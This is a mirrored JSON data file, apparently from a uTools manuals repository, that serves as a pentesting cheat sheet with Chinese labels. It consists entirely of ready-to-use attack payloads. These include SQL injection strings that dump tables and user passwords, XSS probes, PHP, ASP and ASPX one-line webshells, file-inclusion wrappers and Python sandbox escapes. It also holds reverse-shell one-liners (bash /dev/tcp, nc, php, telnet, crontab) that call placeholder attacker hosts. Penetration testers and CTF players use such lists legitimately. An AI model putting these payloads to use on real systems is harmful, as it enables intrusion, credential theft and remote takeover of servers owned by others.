mirror of
https://github.com/fofolee/uTools-Manuals.git
synced 2025-06-25 02:13:07 +08:00
1 line
4.1 KiB
JSON
1 line
4.1 KiB
JSON
[{ "name": "union select 1,user(),3", "type": "sql注入", "path": "", "desc": "联合查询暴显示位" }, { "name": "union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+", "type": "sql注入", "path": "", "desc": "联合查询暴表名" }, { "name": "union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+", "type": "sql注入", "path": "", "desc": "联合查询暴字段名" }, { "name": "union select 1,username,password from `key` --+", "type": "sql注入", "path": "", "desc": "联合查询暴字段值" }, { "name": "admin' or '1'='1", "type": "sql注入", "path": "", "desc": "万能密码" }, { "name": "and length(database())=4 --+", "type": "sql注入", "path": "", "desc": "布尔盲注测试" }, { "name": "or if(ascii(substr(database(),1,1))>0,sleep(1),1) --+", "type": "sql注入", "path": "", "desc": "时间盲注测试" }, { "name": "select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);", "type": "sql注入", "path": "", "desc": "floor报错注入" }, { "name": "select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));", "type": "sql注入", "path": "", "desc": "extractvalue报错注入" }, { "name": "<img src=1 onerror=alert(/xss/)>", "type": "XSS", "path": "", "desc": "XSS测试" }, { "name": "<sCrIpt>alert(/xss/)</ScRipt>", "type": "XSS", "path": "", "desc": "XSS测试" }, { "name": "' onmouseover='alert(/xss/)", "type": "XSS", "path": "", "desc": "XSS测试" }, { "name": "javascript:alert(/xss/)", "type": "XSS", "path": "", "desc": "XSS测试" }, { "name": "<body onload=alert(/xss/)>", "type": "XSS", "path": "", "desc": "XSS测试" }, { "name": "<body background=\"javascript:alert(1)\">", "type": "XSS", "path": "", "desc": "XSS测试" }, { "name": "<?php eval($_POST['pwd']);?>", "type": "webshell", "path": "", "desc": "php一句话" }, { "name": "<%execute(request('pwd'))%>", "type": "webshell", "path": "", "desc": "asp一句话" }, { "name": "<% @Page Language='Jscript'%><%eval(Request.Item['pwd'],'unsafe');%>", "type": "webshell", "path": "", "desc": "aspx一句话" }, { "name": "copy 1.jpg /b + 1.php /b hack.php", "type": "webshell", "path": "", "desc": "生成图马" }, { "name": "php://filter/read=convert.base64-encode/resource=index.php", "type": "文件包含", "path": "", "desc": "php伪协议,以base64编码输出" }, { "name": "php://filter/write=convert.base64-decode/resource=xx.php", "type": "文件包含", "path": "", "desc": "php伪协议,以base64解码写入" }, { "name": "data:text/plain,<?php system('whoami')?>", "type": "文件包含", "path": "", "desc": "data协议命令执行" }, { "name": "/bin/bash -i >& /dev/tcp/xx.xx.xx.xx/1234 0>&1", "type": "getshell", "path": "", "desc": "bash反弹shell" }, { "name": "nc -e /bin/sh xx.xx.xx.xx 1234", "type": "getshell", "path": "", "desc": "nc反弹shell" }, { "name": "php -r '$sock=fsockopen(\"xx.xx.xx.xx\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'", "type": "getshell", "path": "", "desc": "php反弹shell" }, { "name": "telnet xx.xx.xx.xx 8080 | /bin/bash | telnet xx.xx.xx.xx 9090", "type": "getshell", "path": "", "desc": "telnet反弹shell" }, { "name": "* * * * * /bin/bash -i >& /dev/tcp//1234 0>&1", "type": "getshell", "path": "", "desc": "crontab反弹shell" }, { "name": "python -c 'import pty; pty.spawn(\"/bin/bash\")'", "type": "getshell", "path": "", "desc": "获得伪终端" }, { "name": "''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('ls')", "type": "getshell", "path": "", "desc": "python2沙箱逃逸" }, { "name": "''.__class__.__mro__[-1].__subclasses__()[117].__init__.__globals__['system']('ls')", "type": "getshell", "path": "", "desc": "python3沙箱逃逸" }, { "name": "nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 xx.xx.xx.0/24", "type": "其他", "path": "", "desc": "存活主机扫描" }, { "name": "document.body.contentEditable='true';document.designMode='on'", "type": "其他", "path": "", "desc": "开启网页可编辑模式" }] |